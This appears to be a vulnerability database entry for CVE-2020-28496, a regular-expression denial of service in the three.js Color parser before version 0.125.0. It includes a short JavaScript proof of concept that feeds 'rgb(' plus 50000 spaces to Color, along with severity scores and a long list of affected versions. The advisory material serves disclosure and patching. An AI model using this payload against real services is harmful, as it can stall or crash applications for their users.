Vulnerability Details CVE-2020-28496
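This affects the package three before 0.125.0; versions 0.125.0 and later are outside the affected range. The issue is a regular expression denial of service (ReDoS): this can happen when handling rgb or hsl colors, where a crafted color string makes parsing take excessive time. Applications that pass untrusted strings to Color on an affected version should bound the string length first. The PoC times the construction of a Color from "rgb(" followed by 50000 spaces.

PoC:

var three = require('three')
function build_blank (n) {
    var ret = "rgb("
    for (var i = 0; i < n; i++) {
        ret += " "
    }
    return ret + "";
}
var Color = three.Color
var time = Date.now();
new Color(build_blank(50000))
var time_cost = Date.now() - time;
console.log(time_cost+" ms")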
Exploit prediction scoring system (EPSS) score
EPSS Score 0.014
EPSS Ranking 79.8%
CVSS Severity
CVSS v3 Score 7.5
CVSS v2 Score 5.0
Products affected by CVE-2020-28496
-
cpe:2.3:a:three_project:three:0.100.0
-
cpe:2.3:a:three_project:three:0.101.0
-
cpe:2.3:a:three_project:three:0.101.1
-
cpe:2.3:a:three_project:three:0.102.0
-
cpe:2.3:a:three_project:three:0.102.1
-
cpe:2.3:a:three_project:three:0.103.0
-
cpe:2.3:a:three_project:three:0.104.0
-
cpe:2.3:a:three_project:three:0.105.0
-
cpe:2.3:a:three_project:three:0.105.1
-
cpe:2.3:a:three_project:three:0.105.2
-
cpe:2.3:a:three_project:three:0.106.0
-
cpe:2.3:a:three_project:three:0.106.1
-
cpe:2.3:a:three_project:three:0.106.2
-
cpe:2.3:a:three_project:three:0.107.0
-
cpe:2.3:a:three_project:three:0.108.0
-
cpe:2.3:a:three_project:three:0.109.0
-
cpe:2.3:a:three_project:three:0.110.0
-
cpe:2.3:a:three_project:three:0.111.0
-
cpe:2.3:a:three_project:three:0.112.0
-
cpe:2.3:a:three_project:three:0.112.1
-
cpe:2.3:a:three_project:three:0.113.0
-
cpe:2.3:a:three_project:three:0.113.1
-
cpe:2.3:a:three_project:three:0.113.2
-
cpe:2.3:a:three_project:three:0.114.0
-
cpe:2.3:a:three_project:three:0.115.0
-
cpe:2.3:a:three_project:three:0.116.0
-
cpe:2.3:a:three_project:three:0.116.1
-
cpe:2.3:a:three_project:three:0.117.0
-
cpe:2.3:a:three_project:three:0.117.1
-
cpe:2.3:a:three_project:three:0.118.0
-
cpe:2.3:a:three_project:three:0.118.1
-
cpe:2.3:a:three_project:three:0.118.2
-
cpe:2.3:a:three_project:three:0.118.3
-
cpe:2.3:a:three_project:three:0.119.0
-
cpe:2.3:a:three_project:three:0.119.1
-
cpe:2.3:a:three_project:three:0.120.0
-
cpe:2.3:a:three_project:three:0.120.1
-
cpe:2.3:a:three_project:three:0.121.0
-
cpe:2.3:a:three_project:three:0.121.1
-
cpe:2.3:a:three_project:three:0.122.0
-
cpe:2.3:a:three_project:three:0.123.0
-
cpe:2.3:a:three_project:three:0.124.0
-
cpe:2.3:a:three_project:three:0.54.0
-
cpe:2.3:a:three_project:three:0.54.1
-
cpe:2.3:a:three_project:three:0.54.10
-
cpe:2.3:a:three_project:three:0.54.11
-
cpe:2.3:a:three_project:three:0.54.12
-
cpe:2.3:a:three_project:three:0.54.2
-
cpe:2.3:a:three_project:three:0.54.3
-
cpe:2.3:a:three_project:three:0.54.4
-
cpe:2.3:a:three_project:three:0.54.5
-
cpe:2.3:a:three_project:three:0.54.6
-
cpe:2.3:a:three_project:three:0.54.7
-
cpe:2.3:a:three_project:three:0.54.8
-
cpe:2.3:a:three_project:three:0.54.9
-
cpe:2.3:a:three_project:three:0.55.0
-
cpe:2.3:a:three_project:three:0.56.0
-
cpe:2.3:a:three_project:three:0.56.1
-
cpe:2.3:a:three_project:three:0.56.2
-
cpe:2.3:a:three_project:three:0.56.3
-
cpe:2.3:a:three_project:three:0.56.4
-
cpe:2.3:a:three_project:three:0.56.7
-
cpe:2.3:a:three_project:three:0.58.1
-
cpe:2.3:a:three_project:three:0.58.10
-
cpe:2.3:a:three_project:three:0.58.2
-
cpe:2.3:a:three_project:three:0.58.3
-
cpe:2.3:a:three_project:three:0.58.4
-
cpe:2.3:a:three_project:three:0.58.5
-
cpe:2.3:a:three_project:three:0.58.6
-
cpe:2.3:a:three_project:three:0.58.7
-
cpe:2.3:a:three_project:three:0.58.8
-
cpe:2.3:a:three_project:three:0.58.9
-
cpe:2.3:a:three_project:three:0.66.0
-
cpe:2.3:a:three_project:three:0.66.1
-
cpe:2.3:a:three_project:three:0.66.10
-
cpe:2.3:a:three_project:three:0.66.11
-
cpe:2.3:a:three_project:three:0.66.12
-
cpe:2.3:a:three_project:three:0.66.13
-
cpe:2.3:a:three_project:three:0.66.14
-
cpe:2.3:a:three_project:three:0.66.15
-
cpe:2.3:a:three_project:three:0.66.16
-
cpe:2.3:a:three_project:three:0.66.17
-
cpe:2.3:a:three_project:three:0.66.18
-
cpe:2.3:a:three_project:three:0.66.19
-
cpe:2.3:a:three_project:three:0.66.2
-
cpe:2.3:a:three_project:three:0.66.20
-
cpe:2.3:a:three_project:three:0.66.21
-
cpe:2.3:a:three_project:three:0.66.22
-
cpe:2.3:a:three_project:three:0.66.23
-
cpe:2.3:a:three_project:three:0.66.24
-
cpe:2.3:a:three_project:three:0.66.25
-
cpe:2.3:a:three_project:three:0.66.26
-
cpe:2.3:a:three_project:three:0.66.27
-
cpe:2.3:a:three_project:three:0.66.28
-
cpe:2.3:a:three_project:three:0.66.29
-
cpe:2.3:a:three_project:three:0.66.30
-
cpe:2.3:a:three_project:three:0.66.31
-
cpe:2.3:a:three_project:three:0.66.32
-
cpe:2.3:a:three_project:three:0.66.35
-
cpe:2.3:a:three_project:three:0.66.36
-
cpe:2.3:a:three_project:three:0.66.37
-
cpe:2.3:a:three_project:three:0.66.38
-
cpe:2.3:a:three_project:three:0.66.39
-
cpe:2.3:a:three_project:three:0.66.40
-
cpe:2.3:a:three_project:three:0.66.41
-
cpe:2.3:a:three_project:three:0.66.42
-
cpe:2.3:a:three_project:three:0.66.43
-
cpe:2.3:a:three_project:three:0.66.45
-
cpe:2.3:a:three_project:three:0.66.46
-
cpe:2.3:a:three_project:three:0.66.47
-
cpe:2.3:a:three_project:three:0.66.48
-
cpe:2.3:a:three_project:three:0.66.49
-
cpe:2.3:a:three_project:three:0.66.50
-
cpe:2.3:a:three_project:three:0.66.51
-
cpe:2.3:a:three_project:three:0.66.52
-
cpe:2.3:a:three_project:three:0.66.53
-
cpe:2.3:a:three_project:three:0.66.54
-
cpe:2.3:a:three_project:three:0.66.55
-
cpe:2.3:a:three_project:three:0.66.56
-
cpe:2.3:a:three_project:three:0.66.57
-
cpe:2.3:a:three_project:three:0.66.58
-
cpe:2.3:a:three_project:three:0.66.59
-
cpe:2.3:a:three_project:three:0.66.6
-
cpe:2.3:a:three_project:three:0.66.60
-
cpe:2.3:a:three_project:three:0.66.61
-
cpe:2.3:a:three_project:three:0.66.62
-
cpe:2.3:a:three_project:three:0.66.63
-
cpe:2.3:a:three_project:three:0.66.64
-
cpe:2.3:a:three_project:three:0.66.65
-
cpe:2.3:a:three_project:three:0.66.66
-
cpe:2.3:a:three_project:three:0.66.67
-
cpe:2.3:a:three_project:three:0.66.68
-
cpe:2.3:a:three_project:three:0.66.69
-
cpe:2.3:a:three_project:three:0.66.7
-
cpe:2.3:a:three_project:three:0.66.70
-
cpe:2.3:a:three_project:three:0.66.71
-
cpe:2.3:a:three_project:three:0.66.72
-
cpe:2.3:a:three_project:three:0.66.73
-
cpe:2.3:a:three_project:three:0.66.74
-
cpe:2.3:a:three_project:three:0.66.75
-
cpe:2.3:a:three_project:three:0.66.76
-
cpe:2.3:a:three_project:three:0.66.77
-
cpe:2.3:a:three_project:three:0.66.78
-
cpe:2.3:a:three_project:three:0.66.79
-
cpe:2.3:a:three_project:three:0.66.8
-
cpe:2.3:a:three_project:three:0.66.80
-
cpe:2.3:a:three_project:three:0.66.81
-
cpe:2.3:a:three_project:three:0.66.82
-
cpe:2.3:a:three_project:three:0.66.83
-
cpe:2.3:a:three_project:three:0.66.84
-
cpe:2.3:a:three_project:three:0.66.85
-
cpe:2.3:a:three_project:three:0.66.86
-
cpe:2.3:a:three_project:three:0.66.87
-
cpe:2.3:a:three_project:three:0.66.88
-
cpe:2.3:a:three_project:three:0.66.89
-
cpe:2.3:a:three_project:three:0.66.9
-
cpe:2.3:a:three_project:three:0.66.90
-
cpe:2.3:a:three_project:three:0.66.91
-
cpe:2.3:a:three_project:three:0.66.92
-
cpe:2.3:a:three_project:three:0.66.93
-
cpe:2.3:a:three_project:three:0.66.94
-
cpe:2.3:a:three_project:three:0.66.95
-
cpe:2.3:a:three_project:three:0.66.96
-
cpe:2.3:a:three_project:three:0.66.97
-
cpe:2.3:a:three_project:three:0.67.0
-
cpe:2.3:a:three_project:three:0.68.0
-
cpe:2.3:a:three_project:three:0.68.86
-
cpe:2.3:a:three_project:three:0.68.87
-
cpe:2.3:a:three_project:three:0.69.0
-
cpe:2.3:a:three_project:three:0.70.0
-
cpe:2.3:a:three_project:three:0.70.1
-
cpe:2.3:a:three_project:three:0.71.0
-
cpe:2.3:a:three_project:three:0.71.1
-
cpe:2.3:a:three_project:three:0.72.0
-
cpe:2.3:a:three_project:three:0.73.0
-
cpe:2.3:a:three_project:three:0.73.1
-
cpe:2.3:a:three_project:three:0.73.2
-
cpe:2.3:a:three_project:three:0.74.0
-
cpe:2.3:a:three_project:three:0.75.0
-
cpe:2.3:a:three_project:three:0.76.1
-
cpe:2.3:a:three_project:three:0.77.0
-
cpe:2.3:a:three_project:three:0.77.1
-
cpe:2.3:a:three_project:three:0.78.0
-
cpe:2.3:a:three_project:three:0.79.0
-
cpe:2.3:a:three_project:three:0.80.0
-
cpe:2.3:a:three_project:three:0.80.1
-
cpe:2.3:a:three_project:three:0.81.0
-
cpe:2.3:a:three_project:three:0.81.1
-
cpe:2.3:a:three_project:three:0.81.2
-
cpe:2.3:a:three_project:three:0.82.0
-
cpe:2.3:a:three_project:three:0.82.1
-
cpe:2.3:a:three_project:three:0.83.0
-
cpe:2.3:a:three_project:three:0.84.0
-
cpe:2.3:a:three_project:three:0.85.0
-
cpe:2.3:a:three_project:three:0.85.1
-
cpe:2.3:a:three_project:three:0.85.2
-
cpe:2.3:a:three_project:three:0.86.0
-
cpe:2.3:a:three_project:three:0.87.0
-
cpe:2.3:a:three_project:three:0.87.1
-
cpe:2.3:a:three_project:three:0.88.0
-
cpe:2.3:a:three_project:three:0.89.0
-
cpe:2.3:a:three_project:three:0.90.0
-
cpe:2.3:a:three_project:three:0.91.0
-
cpe:2.3:a:three_project:three:0.92.0
-
cpe:2.3:a:three_project:three:0.93.0
-
cpe:2.3:a:three_project:three:0.94.0
-
cpe:2.3:a:three_project:three:0.95.0
-
cpe:2.3:a:three_project:three:0.96.0
-
cpe:2.3:a:three_project:three:0.97.0
-
cpe:2.3:a:three_project:three:0.98.0
-
cpe:2.3:a:three_project:three:0.99.0